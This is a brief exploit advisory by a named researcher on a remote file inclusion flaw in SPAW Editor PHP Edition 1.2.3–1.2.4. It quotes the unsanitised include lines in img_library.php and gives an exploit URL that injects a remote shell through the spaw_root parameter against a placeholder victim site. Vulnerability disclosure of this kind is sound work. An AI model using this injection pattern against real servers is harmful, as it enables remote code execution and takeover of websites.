SPAW Editor PHP Edition versions 1.2.3 and 1.2.4 suffer from a remote file inclusion vulnerability.
4dd387f5ffaec616da03e2089b6c4486e7ce512fa512a0dd05f393dd9a6b58b4
Remote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4
Discovered By : Hasadya Raed
Contact Me : RaeD[at]BsdMail[dot]Com
Download Script:
http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip
B.File :img_library.php :
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK]
By Hasadya Raed
--